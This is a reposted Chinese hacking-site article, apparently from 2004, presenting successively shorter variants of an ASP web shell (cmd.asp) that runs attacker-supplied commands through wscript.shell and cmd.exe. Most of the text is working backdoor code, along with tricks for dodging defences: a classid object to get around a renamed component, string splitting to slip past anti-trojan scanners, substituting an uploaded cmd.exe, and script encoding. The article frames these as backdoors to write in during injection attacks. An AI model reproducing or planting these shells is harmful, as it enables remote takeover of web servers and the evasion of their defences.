黑基Web安全攻防班
安基网 首页 IT技术 电脑技术 查看内容

关于最小asp的后门的几个有趣变化

2004-10-2 05:54| 投稿: computer


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要: 作者:lcx    这里的asp后门不指像那些一句话木马、砍客、冰狐之类的b/s型的,只指像cmd.asp或2005a.asp的。第一个,来看zzzeva免fso的c...
作者:lcx    这里的asp后门不指像那些一句话木马、砍客、冰狐之类的b/s型的,只指像cmd.asp或2005a.asp的。第一个,来看zzzeva免fso的cmd.asp代码如下:<form method="post"><input type=text name="cmd" size=60><input type=submit value="run"></form><textarea readonly cols=80 rows=20><%response.write server.createobject("wscript.shell").exec("cmd.exe /c "&request.form("cmd")).stdout.readall%></textarea>是不是觉得有点长了?在注入时写有点不好写。那来改一下。第二个,更改zzzeva免fso的cmd.asp代码如下: <textarea readonly cols=80 rows=20><%response.write server.createobject("wscript.shell").exec("cmd.exe /c "&request("cmd")).stdout.readall%> 用法是xx.asp?cmd=net user这样是为了得到结果排得方便,其实如果不为美观,还可以更短,那来第三个第三个,缩短的cmd.asp <%response.write server.createobject("wscript.shell").exec("cmd.exe /c "&request("cmd")).stdout.readall%> 这里用了response.write,变量用了cmd。为什么不更短呢?第四个,更短的cmd.asp <%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%> 好像这就是最短的了。除了短,我们还要在别的地方下功夫。第五个,wscript.shell被改名怎么办?代码: <ObjEct runat=sErvEr iD=kk scOpE=pagE classiD="clsiD:72C24DD5-D70A-438B-8A42-98424B88AFB8"></ObjEct><%=kk.exec("cmd /c "+request("cmd")).stdout.readall%> 当然,classid值在不同系统下有所不同。这个要自行更改 第六个,被一些杀asp木马的软件检测出来怎么办?把变量拆开呀。代码: <%=server.createobject("ws"+"cript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%> 或 <%=server.createobject("ws"&"cript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%> 这里代码引号里的东东都可以随便拆的,像还可以拆成 <%=server.createobject("ws"&"cript.shell").exec("c"&"md.exe /c "&request("c")).stdout.readall%> 第7个,cmd.exe不让调用怎么办?这个你自己上传一个cmd.exe,放在一个可以调用的目录下,代码更改如下: <%=server.createobject("wscript.shell").exec("e:\aspx\cmD.EXE /c "&request("c")).stdout.readall%> 第8个,asp代码可以加密吗?当然可以了工具:http://download.microsoft.com/download/winscript56/Install/1.0/WIN98MeXP/CN/sce10chs.exe

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

最新

返回顶部